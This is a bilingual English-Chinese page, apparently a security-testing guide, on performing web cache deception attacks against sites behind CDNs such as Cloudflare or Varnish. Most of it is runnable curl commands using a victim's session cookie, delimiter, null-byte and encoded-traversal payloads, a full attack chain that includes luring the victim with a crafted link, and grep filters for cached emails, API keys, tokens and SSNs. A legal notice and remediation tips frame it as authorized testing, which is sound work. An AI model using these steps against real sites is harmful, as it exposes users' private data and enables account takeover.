Back to Details

performing-web-cache-deception-attack

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Performing Web Cache Deception Attack

实施Web缓存欺骗攻击

When to Use

适用场景

  • When testing applications behind CDNs or reverse proxies (Cloudflare, Akamai, Varnish, Nginx)
  • During assessment of authenticated page caching behavior
  • When evaluating path normalization differences between caching and origin layers
  • During bug bounty hunting on applications with aggressive caching policies
  • When testing for sensitive data exposure through cache layer misconfiguration
  • 测试CDN或反向代理(Cloudflare、Akamai、Varnish、Nginx)后的应用程序时
  • 评估已认证页面的缓存行为时
  • 评估缓存层与源层之间的路径规范化差异时
  • 在具有激进缓存策略的应用程序上进行漏洞赏金挖掘时
  • 测试缓存层配置错误导致的敏感数据泄露时

Prerequisites

前提条件

  • Understanding of HTTP caching mechanisms (Cache-Control, Vary, Age headers)
  • Knowledge of CDN path normalization and cache key construction
  • Burp Suite for intercepting and crafting requests
  • Two browser sessions (authenticated victim and unauthenticated attacker)
  • Understanding of URL path parsing differences across technologies
  • Familiarity with common CDN platforms (Cloudflare, Akamai, Fastly, AWS CloudFront)
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
  • 了解HTTP缓存机制(Cache-Control、Vary、Age请求头)
  • 熟悉CDN路径规范化和缓存键构建方式
  • 使用Burp Suite拦截和构造请求
  • 两个浏览器会话(已认证的受害者会话和未认证的攻击者会话)
  • 了解不同技术对URL路径解析的差异
  • 熟悉常见CDN平台(Cloudflare、Akamai、Fastly、AWS CloudFront)
法律声明: 本技能仅用于授权的安全测试和教育目的。未经授权对不属于您或未获得书面测试许可的系统使用本技能是非法的,可能违反计算机欺诈相关法律。

Workflow

攻击流程

Step 1 — Identify Caching Layer and Behavior

步骤1 — 识别缓存层及行为

bash
undefined
bash
undefined

Determine if a caching layer exists

判断是否存在缓存层

curl -I http://target.com/account/profile
curl -I http://target.com/account/profile

Look for: X-Cache, CF-Cache-Status, Age, Via, X-Varnish headers

查找:X-Cache、CF-Cache-Status、Age、Via、X-Varnish请求头

Check caching rules for static extensions

检查静态扩展名的缓存规则

curl -I "http://target.com/static/style.css"
curl -I "http://target.com/static/style.css"

Look for: X-Cache: HIT, CF-Cache-Status: HIT, Age: >0

查找:X-Cache: HIT、CF-Cache-Status: HIT、Age: >0

Identify which extensions are cached

识别哪些扩展名会被缓存

for ext in css js png jpg gif svg ico woff woff2 pdf; do echo -n "$ext: " curl -sI "http://target.com/test.$ext" | grep -i "x-cache|cf-cache" done
undefined
for ext in css js png jpg gif svg ico woff woff2 pdf; do echo -n "$ext: " curl -sI "http://target.com/test.$ext" | grep -i "x-cache|cf-cache" done
undefined

Step 2 — Test Path-Based Cache Deception

步骤2 — 测试基于路径的缓存欺骗

bash
undefined
bash
undefined

Classic web cache deception: append static extension to dynamic URL

经典Web缓存欺骗:在动态URL后追加静态扩展名

Victim visits: http://target.com/account/profile/nonexistent.css

受害者访问:http://target.com/account/profile/nonexistent.css

If origin returns profile page and CDN caches it based on .css extension:

如果源服务器返回个人资料页面,且CDN基于.css扩展名缓存该页面:

Step 1: As victim (authenticated), visit:

步骤1:以受害者(已认证)身份访问:

curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/anything.css"
curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/anything.css"

Step 2: As attacker (unauthenticated), request same URL:

步骤2:以攻击者(未认证)身份请求同一URL:

curl "http://target.com/account/profile/anything.css"
curl "http://target.com/account/profile/anything.css"

If victim's profile data is returned, cache deception is confirmed

如果返回受害者的个人资料数据,则确认存在缓存欺骗漏洞

Test various extensions

测试多种扩展名

for ext in css js png jpg svg ico woff2; do curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/x.$ext" -o /dev/null sleep 2 echo -n "$ext: " curl -s "http://target.com/account/profile/x.$ext" | head -c 200 echo done
undefined
for ext in css js png jpg svg ico woff2; do curl -b "session=VICTIM_SESSION" "http://target.com/account/profile/x.$ext" -o /dev/null sleep 2 echo -n "$ext: " curl -s "http://target.com/account/profile/x.$ext" | head -c 200 echo done
undefined

Step 3 — Exploit Delimiter-Based Discrepancies

步骤3 — 利用分隔符差异

bash
undefined
bash
undefined

Use path delimiters that CDN and origin interpret differently

使用CDN与源服务器解释不同的路径分隔符

Semicolon delimiter (ignored by CDN, processed by origin)

分号分隔符(CDN忽略,源服务器处理)

curl -b "session=VICTIM" "http://target.com/account/profile;anything.css"
curl -b "session=VICTIM" "http://target.com/account/profile;anything.css"

Encoded characters

编码字符

curl -b "session=VICTIM" "http://target.com/account/profile%2Fstatic.css" curl -b "session=VICTIM" "http://target.com/account/profile%3Bstyle.css"
curl -b "session=VICTIM" "http://target.com/account/profile%2Fstatic.css" curl -b "session=VICTIM" "http://target.com/account/profile%3Bstyle.css"

Null byte injection

空字节注入

curl -b "session=VICTIM" "http://target.com/account/profile%00.css"
curl -b "session=VICTIM" "http://target.com/account/profile%00.css"

Fragment identifier abuse

片段标识符滥用

curl -b "session=VICTIM" "http://target.com/account/profile%23.css"
curl -b "session=VICTIM" "http://target.com/account/profile%23.css"

Dot segment normalization

点段规范化

curl -b "session=VICTIM" "http://target.com/static/..%2Faccount/profile"
undefined
curl -b "session=VICTIM" "http://target.com/static/..%2Faccount/profile"
undefined

Step 4 — Test Normalization Discrepancies

步骤4 — 测试规范化差异

bash
undefined
bash
undefined

Path traversal normalization differences

路径遍历规范化差异

CDN normalizes: /account/profile/../static/x.css -> /static/x.css (cached)

CDN规范化:/account/profile/../static/x.css -> /static/x.css(被缓存)

Origin sees: /account/profile (dynamic page returned)

源服务器识别:/account/profile(返回动态页面)

curl -b "session=VICTIM" "http://target.com/static/../account/profile"
curl -b "session=VICTIM" "http://target.com/static/../account/profile"

CDN may cache as /account/profile if it normalizes differently than origin

如果CDN与源服务器的规范化方式不同,CDN可能会将其缓存为/account/profile

Encoded path traversal

编码后的路径遍历

curl -b "session=VICTIM" "http://target.com/static/..%2faccount/profile"
curl -b "session=VICTIM" "http://target.com/static/..%2faccount/profile"

Case sensitivity differences

大小写敏感性差异

curl -b "session=VICTIM" "http://target.com/account/profile/X.CSS"
curl -b "session=VICTIM" "http://target.com/account/profile/X.CSS"

Double-encoded paths

双重编码路径

curl -b "session=VICTIM" "http://target.com/account/profile/%252e%252e/static.css"
undefined
curl -b "session=VICTIM" "http://target.com/account/profile/%252e%252e/static.css"
undefined

Step 5 — Exploit Cache Key Manipulation

步骤5 — 利用缓存键操纵

bash
undefined
bash
undefined

Identify cache key components

识别缓存键组成部分

CDN may use: scheme + host + path (excluding query string)

CDN可能使用:协议 + 主机 + 路径(不包含查询字符串)

Test if query string affects caching

测试查询字符串是否影响缓存

curl -b "session=VICTIM" "http://target.com/account/profile?cachebuster=123.css"
curl -b "session=VICTIM" "http://target.com/account/profile?cachebuster=123.css"

Test if the CDN uses the full path or normalized path as cache key

测试CDN是否使用完整路径或规范化路径作为缓存键

curl -b "session=VICTIM" "http://target.com/account/profile/./style.css" curl "http://target.com/account/profile/./style.css" # Check if cached
curl -b "session=VICTIM" "http://target.com/account/profile/./style.css" curl "http://target.com/account/profile/./style.css" # 检查是否被缓存

Header-based cache key manipulation

基于请求头的缓存键操纵

curl -b "session=VICTIM" -H "X-Original-URL: /account/profile"
"http://target.com/static/cached.css"
undefined
curl -b "session=VICTIM" -H "X-Original-URL: /account/profile"
"http://target.com/static/cached.css"
undefined

Step 6 — Verify and Document the Attack

步骤6 — 验证并记录攻击

bash
undefined
bash
undefined

Full attack chain:

完整攻击链:

1. Craft malicious URL: http://target.com/account/profile/x.css

1. 构造恶意URL:http://target.com/account/profile/x.css

2. Send URL to victim (via social engineering, email, etc.)

2. 将URL发送给受害者(通过社会工程、邮件等方式)

3. Victim clicks link while authenticated

3. 受害者在已认证状态下点击链接

4. CDN caches the authenticated response

4. CDN缓存已认证的响应内容

5. Attacker requests the same URL without authentication

5. 攻击者无需认证即可请求同一URL

6. CDN serves cached authenticated content to attacker

6. CDN向攻击者提供缓存的已认证内容

Verify cache status

验证缓存状态

curl -I "http://target.com/account/profile/x.css"
curl -I "http://target.com/account/profile/x.css"

Confirm: X-Cache: HIT or CF-Cache-Status: HIT

确认:X-Cache: HIT 或 CF-Cache-Status: HIT

Check what sensitive data is exposed

检查泄露的敏感数据

curl -s "http://target.com/account/profile/x.css" | grep -i "email|name|token|api_key|ssn"
undefined
curl -s "http://target.com/account/profile/x.css" | grep -i "email|name|token|api_key|ssn"
undefined

Key Concepts

核心概念

ConceptDescription
Cache DeceptionTricking CDN into caching authenticated dynamic content as static resource
Path NormalizationHow CDN and origin differently resolve path segments (../, ;, encoded chars)
Cache KeyThe identifier CDN uses to store/retrieve cached responses (typically URL path)
Static Extension TrickAppending .css/.js/.png to dynamic URLs to trigger caching behavior
Delimiter DiscrepancyCharacters (;, ?, #) interpreted differently by cache vs. origin server
Cache Poisoning vs DeceptionPoisoning modifies cache for all users; deception caches specific victim data
Vary HeaderHTTP header controlling which request attributes affect cache key
概念描述
缓存欺骗诱使CDN将已认证的动态内容作为静态资源缓存
路径规范化CDN与源服务器解析路径段(../、;、编码字符)的不同方式
缓存键CDN用于存储/检索缓存响应的标识符(通常为URL路径)
静态扩展名技巧在动态URL后追加.css/.js/.png以触发缓存行为
分隔符差异缓存层与源服务器对字符(;、?、#)的解释不同
缓存投毒vs缓存欺骗投毒会修改所有用户的缓存内容;欺骗仅缓存特定受害者的数据
Vary请求头控制哪些请求属性会影响缓存键的HTTP请求头

Tools & Systems

工具与系统

ToolPurpose
Burp SuiteHTTP proxy for crafting cache deception requests
curlCommand-line testing of cache behavior and response headers
Web Cache Vulnerability ScannerAutomated tool for detecting cache deception/poisoning
Param MinerBurp extension for discovering unkeyed cache parameters
Cloudflare DiagnosticsAnalyzing CF-Cache-Status and cf-ray headers
Varnish CLIDirect cache inspection for Varnish-based setups
工具用途
Burp Suite用于构造缓存欺骗请求的HTTP代理
curl用于测试缓存行为和响应头的命令行工具
Web Cache Vulnerability Scanner检测缓存欺骗/投毒的自动化工具
Param Miner用于发现未加入缓存键的参数的Burp扩展
Cloudflare Diagnostics分析CF-Cache-Status和cf-ray请求头
Varnish CLI基于Varnish的环境下直接检查缓存

Common Scenarios

常见场景

  1. Profile Data Theft — Cache authenticated user profile pages containing PII (email, address, phone) by appending .css extension to profile URLs
  2. API Token Exposure — Cache API dashboard pages showing tokens and secrets through path manipulation on CDN
  3. Account Takeover — Cache pages containing session tokens or CSRF tokens, then use stolen tokens for account takeover
  4. Financial Data Exposure — Cache banking or payment pages showing account balances and transaction history
  5. Admin Panel Caching — Cache admin pages accessible through delimiter-based path confusion on CDN
  1. 个人资料数据窃取 — 通过在个人资料URL后追加.css扩展名,缓存包含PII(邮箱、地址、电话)的已认证用户个人资料页面
  2. API令牌泄露 — 通过CDN路径操纵,缓存显示令牌和密钥的API仪表盘页面
  3. 账户接管 — 缓存包含会话令牌或CSRF令牌的页面,然后利用窃取的令牌接管账户
  4. 财务数据泄露 — 缓存显示账户余额和交易记录的银行或支付页面
  5. 管理面板缓存 — 通过CDN上基于分隔符的路径混淆,缓存可访问的管理面板页面

Output Format

输出格式

undefined
undefined

Web Cache Deception Report

Web缓存欺骗报告

  • Target: http://target.com
  • CDN: Cloudflare
  • Vulnerability: Path-based cache deception via static extension appending
  • 目标: http://target.com
  • CDN: Cloudflare
  • 漏洞: 通过追加静态扩展名实现的基于路径的缓存欺骗

Cache Behavior Analysis

缓存行为分析

ExtensionCachedCache-ControlTTL
.cssYespublic, max-age=8640024h
.jsYespublic, max-age=8640024h
.pngYespublic, max-age=6048007d
扩展名是否缓存Cache-ControlTTL
.csspublic, max-age=8640024h
.jspublic, max-age=8640024h
.pngpublic, max-age=6048007d

Exploitation Results

利用结果

Victim URLCached DataSensitive Fields
/account/profile/x.cssFull profile pageEmail, Name, API Key
/account/settings/x.jsSettings page2FA backup codes
受害者URL缓存数据敏感字段
/account/profile/x.css完整个人资料页面邮箱、姓名、API密钥
/account/settings/x.js设置页面双因素认证备份码

Remediation

修复建议

  • Configure CDN to respect Cache-Control: no-store on dynamic pages
  • Implement Vary: Cookie header on authenticated endpoints
  • Use path-based routing rules that reject unexpected extensions
  • Enable consistent path normalization between CDN and origin
undefined
  • 配置CDN以遵循动态页面的Cache-Control: no-store规则
  • 在已认证端点上实现Vary: Cookie请求头
  • 使用基于路径的路由规则,拒绝意外的扩展名
  • 确保CDN与源服务器之间的路径规范化保持一致
undefined